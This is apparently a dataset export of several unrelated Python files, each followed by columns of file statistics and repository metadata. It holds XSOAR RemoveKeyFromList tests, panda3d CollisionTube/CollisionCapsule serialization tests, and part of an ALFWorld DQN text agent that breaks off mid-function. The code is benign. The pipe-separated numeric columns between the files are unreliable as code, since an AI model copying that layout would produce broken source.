    print("by Team Avengers\nMIT LICENSE\nVERSION 0.0.8\n\n" + Fore.RESET)
| 30.6875
| 161
| 0.476578
| 37
| 491
| 3.864865
| 0.594595
| 0.055944
| 0.195804
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011364
| 0.283096
| 491
| 16
| 162
| 30.6875
| 0.394886
| 0.386965
| 0
| 0
| 0
| 0.25
| 0.664311
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0.75
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c5477f45e6dfa2badd5339c1d180bcbf0140f2f9
| 5,102
|
py
|
Python
|
Packs/CommonScripts/Scripts/RemoveKeyFromList/RemoveKeyFromList_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799
|
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/RemoveKeyFromList/RemoveKeyFromList_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317
|
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/RemoveKeyFromList/RemoveKeyFromList_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297
|
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from RemoveKeyFromList import remove_key_from_list_command
import demistomock as demisto # noqa # pylint: disable=unused-wildcard-import
from typing import List, Dict, Any
import json
MOCK_LIST_NAME = "TestList"  # XSOAR list name used by every test below
MOCK_KEY_NAME = "TestKey"    # key the tests attempt to remove from the list
def test_remove_nonexisting_key_in_nonempty_list(mocker):
    """
    Given:
        - a nonempty list with some value
        - a key that doesn't exist in the list
    When
        - trying to remove a key that doesn't exist in the list
    Then
        - a message saying the key was not found is returned
    """
    start_list: Dict = {"AnotherKey": "SomeValue"}

    def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
        # Minimal stand-in for demisto.executeCommand covering the two
        # commands the script under test can issue.
        if name == 'getList':
            return [{"Contents": json.dumps(start_list)}]
        if name == 'setList':
            return [{"Contents": f"Done: list {name} was updated"}]
        raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")

    mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
    result = remove_key_from_list_command({'listName': MOCK_LIST_NAME, 'keyName': MOCK_KEY_NAME})
    assert result.readable_output == f'Key {MOCK_KEY_NAME} not found in list {MOCK_LIST_NAME}, cannot remove.'
    # Only the read happens; a missing key must not trigger a write-back.
    assert len(mocked_ec.call_args_list) == 1
def test_remove_nonexisting_key_in_empty_list(mocker):
    """
    Given:
        - an empty list
        - a key that doesn't exist in the list
    When
        - trying to remove a key
    Then
        - a message saying the key was not found is returned
    """
    # Empty list: every key lookup must miss.
    MOCKED_START_LIST: Dict = {}

    def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
        # Stub for demisto.executeCommand: serves the mocked list and
        # acknowledges writes; anything else is an error in the script.
        if name == 'getList':
            return [{"Contents": json.dumps(MOCKED_START_LIST)}]
        elif name == 'setList':
            return [{"Contents": f"Done: list {name} was updated"}]
        raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")

    mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
    result = remove_key_from_list_command({
        'listName': MOCK_LIST_NAME,
        'keyName': MOCK_KEY_NAME,
    })
    assert result.readable_output == f'Key {MOCK_KEY_NAME} not found in list {MOCK_LIST_NAME}, cannot remove.'
    # Only the read should have happened; no write for a missing key.
    assert len(mocked_ec.call_args_list) == 1
def test_remove_existing_key(mocker):
    """
    Given:
        - a nonempty list with 2 values
        - a key that exists in the list
    When
        - trying to remove a key that exists in the list
    Then
        - requested key is removed from list
        - list is left with only one item
    """
    MOCKED_START_LIST: Dict = {
        MOCK_KEY_NAME: "Value",
        "AnotherKey": "AnotherValue"
    }
    # Expected list content after the key has been removed.
    MOCKED_END_LIST: Dict = {
        "AnotherKey": "AnotherValue"
    }

    def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
        # Stub for demisto.executeCommand covering the two commands issued.
        if name == 'getList':
            return [{"Contents": json.dumps(MOCKED_START_LIST)}]
        elif name == 'setList':
            return [{"Contents": f"Done: list {name} was updated"}]
        raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")

    mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
    result = remove_key_from_list_command({
        'listName': MOCK_LIST_NAME,
        'keyName': MOCK_KEY_NAME,
    })
    assert result.readable_output == f'Successfully removed key {MOCK_KEY_NAME} from list {MOCK_LIST_NAME}.'
    # One call reads the list, a second writes it back without the key.
    assert len(mocked_ec.call_args_list) == 2
    assert mocked_ec.call_args_list[1][0][0] == 'setList'
    assert json.loads(mocked_ec.call_args_list[1][0][1]['listData']) == MOCKED_END_LIST
def test_remove_existing_last_key(mocker):
    """
    Given:
        - a nonempty list with 1 value
        - a key that exists in the list (the only one that exists)
    When
        - trying to remove the last key of the list
    Then
        - requested key is removed from list
        - list is empty
    """
    start_list: Dict = {MOCK_KEY_NAME: "Value"}
    end_list: Dict = {}

    def executeCommand(name: str, args: Dict[str, Any]) -> List[Dict[str, Any]]:
        # Stand-in for demisto.executeCommand handling the two commands issued.
        if name == 'getList':
            return [{"Contents": json.dumps(start_list)}]
        if name == 'setList':
            return [{"Contents": f"Done: list {name} was updated"}]
        raise ValueError(f"Error: Unknown command or command/argument pair: {name} {args!r}")

    mocked_ec = mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
    result = remove_key_from_list_command({'listName': MOCK_LIST_NAME, 'keyName': MOCK_KEY_NAME})
    assert result.readable_output == f'Successfully removed key {MOCK_KEY_NAME} from list {MOCK_LIST_NAME}.'
    # A read followed by a write of the now-empty list.
    assert len(mocked_ec.call_args_list) == 2
    assert mocked_ec.call_args_list[1][0][0] == 'setList'
    assert json.loads(mocked_ec.call_args_list[1][0][1]['listData']) == end_list
| 34.241611
| 110
| 0.649353
| 681
| 5,102
| 4.660793
| 0.161527
| 0.032766
| 0.038122
| 0.040328
| 0.863894
| 0.854127
| 0.831128
| 0.799937
| 0.777883
| 0.760555
| 0
| 0.004634
| 0.23873
| 5,102
| 148
| 111
| 34.472973
| 0.812564
| 0.170913
| 0
| 0.753086
| 0
| 0
| 0.246555
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 1
| 0.098765
| false
| 0
| 0.049383
| 0
| 0.246914
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d97754d8779ba8c30df67581f86cfacfb093add
| 2,713
|
py
|
Python
|
tests/collide/test_collision_tube.py
|
Psychotropos/panda3d
|
ffe4f387ae9dd6299e6002be95037a44aa5b2a27
|
[
"PHP-3.01",
"PHP-3.0"
] | null | null | null |
tests/collide/test_collision_tube.py
|
Psychotropos/panda3d
|
ffe4f387ae9dd6299e6002be95037a44aa5b2a27
|
[
"PHP-3.01",
"PHP-3.0"
] | null | null | null |
tests/collide/test_collision_tube.py
|
Psychotropos/panda3d
|
ffe4f387ae9dd6299e6002be95037a44aa5b2a27
|
[
"PHP-3.01",
"PHP-3.0"
] | null | null | null |
from panda3d import core
def test_collision_tube_alias():
    """CollisionTube must remain as a backward-compatible alias of CollisionCapsule."""
    for attr in ('CollisionCapsule', 'CollisionTube'):
        assert hasattr(core, attr)
    assert core.CollisionTube is core.CollisionCapsule
def test_collision_tube_write_old():
    """Writing to a pre-6.44 bam stream must emit the legacy CollisionTube type name."""
    sink = core.DatagramBuffer()
    writer = core.BamWriter(sink)
    assert writer.get_file_major_ver() == 6
    # 6.43 is the last version that still serialized the old type name.
    writer.set_file_minor_ver(43)
    shape = core.CollisionCapsule((0, 0, -1), (0, 0, 1), 0.5)
    writer.init()
    writer.write_object(shape)
    writer.flush()
    written = sink.data
    assert b'CollisionTube' in written
    assert b'CollisionCapsule' not in written
def test_collision_tube_write_new():
    # From bam minor version 44 onward, the capsule must be serialized under
    # its new CollisionCapsule type name with no legacy alias in the stream.
    buffer = core.DatagramBuffer()
    writer = core.BamWriter(buffer)
    assert writer.get_file_major_ver() == 6
    writer.set_file_minor_ver(44)
    capsule = core.CollisionCapsule((0, 0, -1), (0, 0, 1), 0.5)
    writer.init()
    writer.write_object(capsule)
    writer.flush()
    data = buffer.data
    assert b'CollisionTube' not in data
    assert b'CollisionCapsule' in data
def test_collision_tube_read_old():
    # Make sure we can read an older file that contains CollisionTube.
    # The blob is a pre-captured 6.43 bam stream whose type table still uses
    # the legacy "CollisionTube" name.
    buffer = core.DatagramBuffer(b'\x06\x00\x00\x00\x06\x00+\x00\x01\x00\xd6\x00\x00\x00\x00j\x01\r\x00CollisionTube\x01h\x01\x0e\x00CollisionSolid\x01B\x00\x11\x00CopyOnWriteObject\x01A\x00!\x00CachedTypedWritableReferenceCount\x01=\x00\x1b\x00TypedWritableReferenceCount\x02<\x00\r\x00TypedWritable\x01\x03\x00\x0b\x00TypedObject\x00\x07\x00\x0e\x00ReferenceCount\x00\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\x00\x00\x00?\x01\x00\x00\x00\x01')
    reader = core.BamReader(buffer)
    reader.init()
    assert reader.file_version == (6, 43)
    capsule = reader.read_object()
    reader.resolve()
    # The legacy type must deserialize as the modern CollisionCapsule class.
    assert isinstance(capsule, core.CollisionCapsule)
def test_collision_tube_read_new():
    # Make sure we can read a newer file that contains CollisionCapsule.
    # The blob is a pre-captured 6.44 bam stream that already uses the new
    # "CollisionCapsule" type name.
    buffer = core.DatagramBuffer(b'\x06\x00\x00\x00\x06\x00,\x00\x01\x00\xd9\x00\x00\x00\x00j\x01\x10\x00CollisionCapsule\x01h\x01\x0e\x00CollisionSolid\x01B\x00\x11\x00CopyOnWriteObject\x01A\x00!\x00CachedTypedWritableReferenceCount\x01=\x00\x1b\x00TypedWritableReferenceCount\x02<\x00\r\x00TypedWritable\x01\x03\x00\x0b\x00TypedObject\x00\x07\x00\x0e\x00ReferenceCount\x00\x01\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\x00\x00\x00?\x01\x00\x00\x00\x01')
    reader = core.BamReader(buffer)
    reader.init()
    assert reader.file_version == (6, 44)
    capsule = reader.read_object()
    reader.resolve()
    assert isinstance(capsule, core.CollisionCapsule)
| 42.390625
| 514
| 0.743826
| 391
| 2,713
| 5.066496
| 0.222506
| 0.163554
| 0.181726
| 0.169611
| 0.859162
| 0.787481
| 0.730944
| 0.730944
| 0.730944
| 0.730944
| 0
| 0.140093
| 0.123848
| 2,713
| 63
| 515
| 43.063492
| 0.693311
| 0.048286
| 0
| 0.577778
| 0
| 0.044444
| 0.401706
| 0.367972
| 0
| 0
| 0
| 0
| 0.288889
| 1
| 0.111111
| false
| 0
| 0.022222
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3df65b8c8e6ce73839bc2aea7f1cb7702a7198e0
| 57,417
|
py
|
Python
|
alfworld/agents/agent/text_dqn_agent.py
|
zhaozj89/alfworld_meta_dqn
|
4ad3ee6e57a6b808d4d90d48f00f14e4e8ec593d
|
[
"MIT"
] | null | null | null |
alfworld/agents/agent/text_dqn_agent.py
|
zhaozj89/alfworld_meta_dqn
|
4ad3ee6e57a6b808d4d90d48f00f14e4e8ec593d
|
[
"MIT"
] | null | null | null |
alfworld/agents/agent/text_dqn_agent.py
|
zhaozj89/alfworld_meta_dqn
|
4ad3ee6e57a6b808d4d90d48f00f14e4e8ec593d
|
[
"MIT"
] | null | null | null |
import copy
import operator
import logging
from queue import PriorityQueue
import numpy as np
import torch
import torch.nn.functional as F
logging.getLogger("transformers.tokenization_utils").setLevel(logging.ERROR)
from alfworld.agents.agent import BaseAgent
from alfworld.agents.modules.generic import to_np, to_pt, _words_to_ids, pad_sequences, preproc, max_len, ez_gather_dim_1, LinearSchedule, BeamSearchNode
from alfworld.agents.modules.layers import NegativeLogLoss, masked_mean, compute_mask, GetGenerationQValue
class TextDQNAgent(BaseAgent):
'''
TextAgent trained with DQN (Reinforcement Learning)
'''
def __init__(self, *args, **kwargs):
    # Delegate all configuration to BaseAgent; this subclass only
    # specializes DQN-style action selection.
    super().__init__(*args, **kwargs)
    # Guard: this agent class implements the "dqn" training method only.
    assert self.training_method == "dqn"
def choose_random_action(self, action_rank, action_unpadded=None):
    """
    Select one action index uniformly at random for every batch item.

    When `action_unpadded` is given, sampling is restricted to each item's
    real (unpadded) candidate list; otherwise the full padded action
    dimension of `action_rank` is used.
    """
    batch_size = action_rank.size(0)
    num_actions = action_rank.size(1)
    if action_unpadded is None:
        # Sample over the padded action space for every batch item at once.
        return np.random.choice(num_actions, batch_size)
    # Sample per item, only among its genuine candidates.
    return np.array([np.random.choice(len(cands)) for cands in action_unpadded])
def choose_maxQ_action(self, action_rank, action_mask=None):
    """
    Generate an action by maximum q values.

    Shifts scores to be strictly positive, zeroes out masked entries, and
    returns the per-item argmax as a numpy array of indices.
    """
    # Minus the min value so all values are positive; masked-out entries
    # (multiplied by 0 below) then can never win the argmax.
    action_rank = action_rank - torch.min(action_rank, -1, keepdim=True)[0] + 1e-2
    if action_mask is not None:
        # Bug fix: `torch.Size` has no `.shape` attribute, so the original
        # failure message `action_mask.size().shape` itself raised
        # AttributeError whenever the assert fired. Report the sizes directly.
        assert action_mask.size() == action_rank.size(), (action_mask.size(), action_rank.size())
        action_rank = action_rank * action_mask
    action_indices = torch.argmax(action_rank, -1)  # batch
    return to_np(action_indices)
# choosing from list of admissible commands
def admissible_commands_act_greedy(self, observation_strings, task_desc_strings, action_candidate_list, previous_dynamics):
    """For each batch item, greedily pick the admissible command with the highest Q-value."""
    with torch.no_grad():
        obs_enc, obs_mask = self.encode(observation_strings, use_model="online")
        task_enc, task_mask = self.encode(task_desc_strings, use_model="online")
        scores, masks, current_dynamics = self.action_scoring(
            action_candidate_list, obs_enc, obs_mask, task_enc, task_mask,
            previous_dynamics, use_model="online")
        picked = self.choose_maxQ_action(scores, masks).astype(int)
        actions = [cands[i] for cands, i in zip(action_candidate_list, picked)]
        return actions, picked, current_dynamics
def admissible_commands_act_random(self, observation_strings, task_desc_strings, action_candidate_list, previous_dynamics):
    """For each batch item, pick a uniformly random admissible command (pure exploration)."""
    with torch.no_grad():
        obs_enc, obs_mask = self.encode(observation_strings, use_model="online")
        task_enc, task_mask = self.encode(task_desc_strings, use_model="online")
        scores, _, current_dynamics = self.action_scoring(
            action_candidate_list, obs_enc, obs_mask, task_enc, task_mask,
            previous_dynamics, use_model="online")
        picked = self.choose_random_action(scores, action_candidate_list).astype(int)
        actions = [cands[i] for cands, i in zip(action_candidate_list, picked)]
        return actions, picked, current_dynamics
def admissible_commands_act(self, observation_strings, task_desc_strings, action_candidate_list, previous_dynamics, random=False):
    """Epsilon-greedy selection over admissible commands (pure greedy in eval mode)."""
    with torch.no_grad():
        if self.mode == "eval":
            return self.admissible_commands_act_greedy(observation_strings, task_desc_strings, action_candidate_list, previous_dynamics)
        if random:
            return self.admissible_commands_act_random(observation_strings, task_desc_strings, action_candidate_list, previous_dynamics)

        batch_size = len(observation_strings)
        obs_enc, obs_mask = self.encode(observation_strings, use_model="online")
        task_enc, task_mask = self.encode(task_desc_strings, use_model="online")
        scores, masks, current_dynamics = self.action_scoring(
            action_candidate_list, obs_enc, obs_mask, task_enc, task_mask,
            previous_dynamics, use_model="online")

        greedy_idx = self.choose_maxQ_action(scores, masks)
        random_idx = self.choose_random_action(scores, action_candidate_list)
        # Epsilon-greedy mixing: per batch item, keep the random index with
        # probability epsilon, otherwise take the greedy one.
        explore = (np.random.uniform(low=0.0, high=1.0, size=(batch_size,)) < self.epsilon).astype("float32")
        chosen_indices = (explore * random_idx + (1.0 - explore) * greedy_idx).astype(int)
        chosen_actions = [cands[i] for cands, i in zip(action_candidate_list, chosen_indices)]
        return chosen_actions, chosen_indices, current_dynamics
# choosing from output of beam search (without re-compute some intermediate representations)
def beam_search_choice_act_greedy(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
action_candidate_list, current_dynamics, obs_mask, aggregated_obs_representation = self.command_generation_by_beam_search(observation_strings, task_desc_strings, previous_dynamics)
action_scores, action_masks = self.beam_search_candidate_scoring(action_candidate_list,
aggregated_obs_representation,
obs_mask,
current_dynamics,
use_model="online")
action_indices_maxq = self.choose_maxQ_action(action_scores, action_masks)
chosen_indices = action_indices_maxq
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics, action_candidate_list
def beam_search_choice_act_random(self, observation_strings, task_desc_strings, previous_dynamics):
with torch.no_grad():
action_candidate_list, current_dynamics, obs_mask, aggregated_obs_representation = self.command_generation_by_beam_search(observation_strings, task_desc_strings, previous_dynamics)
action_scores, _ = self.beam_search_candidate_scoring(action_candidate_list,
aggregated_obs_representation,
obs_mask,
current_dynamics,
use_model="online")
action_indices_random = self.choose_random_action(action_scores, action_candidate_list)
chosen_indices = action_indices_random
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics, action_candidate_list
def beam_search_choice_act(self, observation_strings, task_desc_strings, previous_dynamics, random=False):
with torch.no_grad():
if self.mode == "eval":
return self.beam_search_choice_act_greedy(observation_strings, task_desc_strings, previous_dynamics)
if random:
return self.beam_search_choice_act_random(observation_strings, task_desc_strings, previous_dynamics)
batch_size = len(observation_strings)
action_candidate_list, current_dynamics, obs_mask, aggregated_obs_representation = self.command_generation_by_beam_search(observation_strings, task_desc_strings, previous_dynamics)
action_scores, action_masks = self.beam_search_candidate_scoring(action_candidate_list,
aggregated_obs_representation,
obs_mask,
current_dynamics,
use_model="online")
action_indices_maxq = self.choose_maxQ_action(action_scores, action_masks)
action_indices_random = self.choose_random_action(action_scores, action_candidate_list)
# random number for epsilon greedy
rand_num = np.random.uniform(low=0.0, high=1.0, size=(batch_size,))
less_than_epsilon = (rand_num < self.epsilon).astype("float32") # batch
greater_than_epsilon = 1.0 - less_than_epsilon
chosen_indices = less_than_epsilon * action_indices_random + greater_than_epsilon * action_indices_maxq
chosen_indices = chosen_indices.astype(int)
chosen_actions = [item[idx] for item, idx in zip(action_candidate_list, chosen_indices)]
return chosen_actions, chosen_indices, current_dynamics, action_candidate_list
# generating token by token
    def command_generation_by_beam_search(self, observation_strings, task_desc_strings, previous_dynamics):
        """Generate up to `self.generate_top_k` candidate commands per example
        using beam search (width `self.beam_width`) over the online decoder.

        Returns (chosen_actions, current_dynamics, obs_mask,
        aggregated_obs_representation): the per-example lists of decoded
        command strings, the updated recurrent state (None when not
        recurrent), and the intermediate encodings so callers can re-score
        candidates without re-encoding the observations.
        """
        with torch.no_grad():
            batch_size = len(observation_strings)
            beam_width = self.beam_width
            generate_top_k = self.generate_top_k
            chosen_actions = []
            input_obs = self.get_word_input(observation_strings)
            h_obs, obs_mask = self.encode(observation_strings, use_model="online")
            h_td, td_mask = self.encode(task_desc_strings, use_model="online")
            aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
            if self.recurrent:
                averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
                current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
            else:
                current_dynamics = None
            # run an independent beam search for each example in the batch
            for b in range(batch_size):
                # starts from CLS tokens
                __input_target_list = [self.word2id["[CLS]"]]
                __input_obs = input_obs[b: b + 1] # 1 x obs_len
                __obs_mask = obs_mask[b: b + 1] # 1 x obs_len
                __aggregated_obs_representation = aggregated_obs_representation[b: b + 1] # 1 x obs_len x hid
                if current_dynamics is not None:
                    __current_dynamics = current_dynamics[b: b + 1] # 1 x hid
                else:
                    __current_dynamics = None
                ended_nodes = []
                # starting node - previous node, input target, logp, length
                node = BeamSearchNode(None, __input_target_list, 0, 1)
                # best-first search: the queue pops the node with the smallest
                # `node.val` first
                nodes_queue = PriorityQueue()
                # start the queue
                nodes_queue.put((node.val, node))
                queue_size = 1
                while(True):
                    # give up when decoding takes too long
                    if queue_size > 2000:
                        break
                    # fetch the best node
                    score, n = nodes_queue.get()
                    __input_target_list = n.input_target
                    # a hypothesis ends when it emits [SEP] or hits the length cap
                    # (the root node itself never counts as ended)
                    if (n.input_target[-1] == self.word2id["[SEP]"] or n.length >= self.max_target_length) and n.previous_node != None:
                        ended_nodes.append((score, n))
                        # if we reached maximum # of sentences required
                        if len(ended_nodes) >= generate_top_k:
                            break
                        else:
                            continue
                    input_target = pad_sequences([__input_target_list], dtype='int32')
                    input_target = to_pt(input_target, self.use_cuda)
                    target_mask = compute_mask(input_target)
                    # decode for one step using decoder
                    pred = self.online_net.decode(input_target, target_mask, __aggregated_obs_representation, __obs_mask, __current_dynamics, __input_obs) # 1 x target_length x vocab
                    pred = pred[0][-1].cpu()
                    # log-probabilities with non-positive entries masked to zero
                    gt_zero = torch.gt(pred, 0.0).float() # vocab
                    epsilon = torch.le(pred, 0.0).float() * 1e-8 # vocab
                    log_pred = torch.log(pred + epsilon) * gt_zero # vocab
                    top_beam_width_log_probs, top_beam_width_indicies = torch.topk(log_pred, beam_width)
                    next_nodes = []
                    for new_k in range(beam_width):
                        # NOTE(review): `pos` is a 0-dim tensor from topk, appended
                        # as-is (not .item()) — downstream pad_sequences/decode
                        # presumably accept this; confirm before changing.
                        pos = top_beam_width_indicies[new_k]
                        log_p = top_beam_width_log_probs[new_k].item()
                        node = BeamSearchNode(n, __input_target_list + [pos], n.log_prob + log_p, n.length + 1)
                        next_nodes.append((node.val, node))
                    # put them into queue
                    for i in range(len(next_nodes)):
                        score, nn = next_nodes[i]
                        nodes_queue.put((score, nn))
                    # increase qsize
                    queue_size += len(next_nodes) - 1
                # choose n best paths
                if len(ended_nodes) == 0:
                    # nothing terminated: fall back to the best unfinished nodes
                    ended_nodes = [nodes_queue.get() for _ in range(generate_top_k)]
                utterances = []
                # sort ascending by queue score (best-first order)
                for score, n in sorted(ended_nodes, key=operator.itemgetter(0)):
                    utte = n.input_target
                    utte_string = self.tokenizer.decode(utte)
                    utterances.append(utte_string)
                utterances = [item.replace("[CLS]", "").replace("[SEP]", "").strip() for item in utterances]
                utterances = [item.replace(" in / on ", " in/on " ) for item in utterances]
                chosen_actions.append(utterances)
            return chosen_actions, current_dynamics, obs_mask, aggregated_obs_representation
    def command_generation_act_greedy(self, observation_strings, task_desc_strings, previous_dynamics):
        """Greedily decode one command per example, token by token.

        Returns (chosen_actions, chosen_indices, current_dynamics): decoded
        command strings, their token-id lists (leading [CLS] and trailing
        [SEP] stripped), and the updated recurrent state (None when
        `self.recurrent` is False).
        """
        with torch.no_grad():
            batch_size = len(observation_strings)
            input_obs = self.get_word_input(observation_strings)
            h_obs, obs_mask = self.encode(observation_strings, use_model="online")
            h_td, td_mask = self.encode(task_desc_strings, use_model="online")
            aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
            if self.recurrent:
                averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
                current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
            else:
                current_dynamics = None
            # greedy generation
            input_target_list = [[self.word2id["[CLS]"]] for i in range(batch_size)]
            # eos[b] flips to 1 once example b has emitted [SEP]
            eos = np.zeros(batch_size)
            for _ in range(self.max_target_length):
                input_target = copy.deepcopy(input_target_list)
                input_target = pad_sequences(input_target, maxlen=max_len(input_target)).astype('int32')
                input_target = to_pt(input_target, self.use_cuda)
                target_mask = compute_mask(input_target) # mask of ground truth should be the same
                pred = self.online_net.decode(input_target, target_mask, aggregated_obs_representation, obs_mask, current_dynamics, input_obs) # batch x target_length x vocab
                # pointer softmax
                pred = to_np(pred[:, -1]) # batch x vocab
                pred = np.argmax(pred, -1) # batch
                for b in range(batch_size):
                    # finished examples stop growing; others append the argmax token
                    new_stuff = [pred[b]] if eos[b] == 0 else []
                    input_target_list[b] = input_target_list[b] + new_stuff
                    if pred[b] == self.word2id["[SEP]"]:
                        eos[b] = 1
                # stop early once every example has terminated
                if np.sum(eos) == batch_size:
                    break
            chosen_actions = [self.tokenizer.decode(item) for item in input_target_list]
            chosen_actions = [item.replace("[CLS]", "").replace("[SEP]", "").strip() for item in chosen_actions]
            chosen_actions = [item.replace(" in / on ", " in/on " ) for item in chosen_actions]
            # drop the leading [CLS] id, and a trailing [SEP] id if present
            chosen_indices = [item[1:] for item in input_target_list]
            for i in range(len(chosen_indices)):
                if chosen_indices[i][-1] == self.word2id["[SEP]"]:
                    chosen_indices[i] = chosen_indices[i][:-1]
            return chosen_actions, chosen_indices, current_dynamics
    def command_generation_act_random(self, observation_strings, task_desc_strings, previous_dynamics):
        """Generate beam-search candidates per example, then sample one uniformly.

        Same beam-search machinery as `command_generation_by_beam_search`, but
        additionally keeps the token-id sequences and returns, per example, one
        randomly chosen (action string, token-id list) pair plus the updated
        recurrent state.
        """
        with torch.no_grad():
            batch_size = len(observation_strings)
            beam_width = self.beam_width
            generate_top_k = self.generate_top_k
            chosen_actions, chosen_indices = [], []
            input_obs = self.get_word_input(observation_strings)
            h_obs, obs_mask = self.encode(observation_strings, use_model="online")
            h_td, td_mask = self.encode(task_desc_strings, use_model="online")
            aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
            if self.recurrent:
                averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
                current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
            else:
                current_dynamics = None
            # independent beam search per batch element
            for b in range(batch_size):
                # starts from CLS tokens
                __input_target_list = [self.word2id["[CLS]"]]
                __input_obs = input_obs[b: b + 1] # 1 x obs_len
                __obs_mask = obs_mask[b: b + 1] # 1 x obs_len
                __aggregated_obs_representation = aggregated_obs_representation[b: b + 1] # 1 x obs_len x hid
                if current_dynamics is not None:
                    __current_dynamics = current_dynamics[b: b + 1] # 1 x hid
                else:
                    __current_dynamics = None
                ended_nodes = []
                # starting node - previous node, input target, logp, length
                node = BeamSearchNode(None, __input_target_list, 0, 1)
                nodes_queue = PriorityQueue()
                # start the queue
                nodes_queue.put((node.val, node))
                queue_size = 1
                while(True):
                    # give up when decoding takes too long
                    if queue_size > 2000:
                        break
                    # fetch the best node
                    score, n = nodes_queue.get()
                    __input_target_list = n.input_target
                    # a hypothesis ends on [SEP] or at the length cap (never the root)
                    if (n.input_target[-1] == self.word2id["[SEP]"] or n.length >= self.max_target_length) and n.previous_node != None:
                        ended_nodes.append((score, n))
                        # if we reached maximum # of sentences required
                        if len(ended_nodes) >= generate_top_k:
                            break
                        else:
                            continue
                    input_target = pad_sequences([__input_target_list], dtype='int32')
                    input_target = to_pt(input_target, self.use_cuda)
                    target_mask = compute_mask(input_target)
                    # decode for one step using decoder
                    pred = self.online_net.decode(input_target, target_mask, __aggregated_obs_representation, __obs_mask, __current_dynamics, __input_obs) # 1 x target_length x vocab
                    pred = pred[0][-1].cpu()
                    # log-probabilities with non-positive entries masked to zero
                    gt_zero = torch.gt(pred, 0.0).float() # vocab
                    epsilon = torch.le(pred, 0.0).float() * 1e-8 # vocab
                    log_pred = torch.log(pred + epsilon) * gt_zero # vocab
                    top_beam_width_log_probs, top_beam_width_indicies = torch.topk(log_pred, beam_width)
                    next_nodes = []
                    for new_k in range(beam_width):
                        # NOTE(review): `pos` is a 0-dim tensor from topk, appended
                        # as-is (not .item()) — confirm downstream handling before
                        # changing.
                        pos = top_beam_width_indicies[new_k]
                        log_p = top_beam_width_log_probs[new_k].item()
                        node = BeamSearchNode(n, __input_target_list + [pos], n.log_prob + log_p, n.length + 1)
                        next_nodes.append((node.val, node))
                    # put them into queue
                    for i in range(len(next_nodes)):
                        score, nn = next_nodes[i]
                        nodes_queue.put((score, nn))
                    # increase qsize
                    queue_size += len(next_nodes) - 1
                # choose n best paths
                if len(ended_nodes) == 0:
                    # nothing terminated: fall back to the best unfinished nodes
                    ended_nodes = [nodes_queue.get() for _ in range(generate_top_k)]
                indicies, utterances = [], []
                for score, n in sorted(ended_nodes, key=operator.itemgetter(0)):
                    utte = n.input_target
